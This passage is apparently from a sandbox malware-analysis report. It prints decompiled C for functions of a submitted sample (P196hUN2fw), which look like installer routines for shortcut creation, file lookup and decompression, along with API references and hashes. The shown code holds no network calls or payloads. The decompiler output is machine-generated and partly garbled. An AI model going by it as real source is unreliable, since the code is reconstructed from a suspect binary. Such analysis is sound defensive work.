              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A
              • API String ID: 2624150263-3554254475
              • Opcode ID: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
              • Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
              • Opcode Fuzzy Hash: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
              • Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E004020CB() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402AC1(0xfffffff0);
				 *(_t111 - 0xc) = E00402AC1(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402AC1(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402AC1(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402AC1(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040596A( *(_t111 - 0xc)) == 0) {
					E00402AC1(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408514, _t87, 1, 0x408504, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408524, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nst356E.tmp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















              0x004020d4
              0x004020de
              0x004020e8
              0x004020f2
              0x004020fd
              0x00402100
              0x0040211a
              0x00402120
              0x00402126
              0x00402129
              0x00402133
              0x00402137
              0x00402137
              0x0040213c
              0x0040214d
              0x00402155
              0x0040222e
              0x0040222e
              0x00402235
              0x0040215b
              0x0040215b
              0x0040216a
              0x0040216e
              0x00402171
              0x00402177
              0x00402185
              0x00402188
              0x0040218a
              0x00402195
              0x00402195
              0x0040219a
              0x0040219c
              0x004021a3
              0x004021a3
              0x004021a6
              0x004021af
              0x004021b2
              0x004021b7
              0x004021b9
              0x004021c6
              0x004021c6
              0x004021c9
              0x004021d2
              0x004021d5
              0x004021de
              0x004021e4
              0x004021eb
              0x00402204
              0x00402206
              0x00402214
              0x00402214
              0x00402204
              0x00402217
              0x0040221d
              0x0040221d
              0x00402220
              0x00402226
              0x0040222c
              0x00402241
              0x00000000
              0x00000000
              0x00000000
              0x0040222c
              0x00402237
              0x00402954
              0x00402960

              APIs
              • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
              Strings
              • C:\Users\user\AppData\Local\Temp\nst356E.tmp, xrefs: 0040218D
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: ByteCharCreateInstanceMultiWide
              • String ID: C:\Users\user\AppData\Local\Temp\nst356E.tmp
              • API String ID: 123533781-321141468
              • Opcode ID: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
              • Instruction ID: 70e90dd273e36d6cf470b0c6c9ff695bb876e65ea6d8ae05c01ad1deac9bcbee
              • Opcode Fuzzy Hash: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
              • Instruction Fuzzy Hash: D9512775A00208BFCF10DFE4C988A9DBBB5EF48318F2045AAF915EB2D1DA799941CF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
              Download Yara Rule
              C-Code - Quality: 39%
              			E004026F8(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402AC1(2), _t19 - 0x1c8) != 0xffffffff) {
					E00405EC3(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00405F65();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




              0x00402710
              0x00402724
              0x0040272f
              0x00402730
              0x0040286f
              0x00402712
              0x00402712
              0x00402714
              0x00402716
              0x00402716
              0x00402954
              0x00402960

              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
              • Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
              • Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
              • Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406742 Relevance: .3, Instructions: 334COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 79%
              			E00406742(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406EB1( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4083f8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4083f8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406F19( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406E71))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e388;
												if( *0x42e388 != 0) {
													L22:
													_t412 =  *0x40a40c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a410; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d204; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d200; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d208;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d688;
													if(_t416 < 0x42d688) {
														L15:
														__eflags = _t416 - 0x42d444;
														_t438 = 8;
														if(_t416 > 0x42d444) {
															__eflags = _t416 - 0x42d608;
															if(_t416 >= 0x42d608) {
																__eflags = _t416 - 0x42d668;
																if(_t416 < 0x42d668) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406F19(0x42d208, 0x120, 0x101, 0x40840c, 0x40844c, 0x42d204, 0x40a40c, 0x42db08, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d208, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d208 + _t440;
														E00406F19(0x42d208, 0x1e, 0, 0x40848c, 0x4084c8, 0x42d200, 0x40a410, 0x42db08, _t448 - 8);
														 *0x42e388 =  *0x42e388 + 1;
														__eflags =  *0x42e388;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
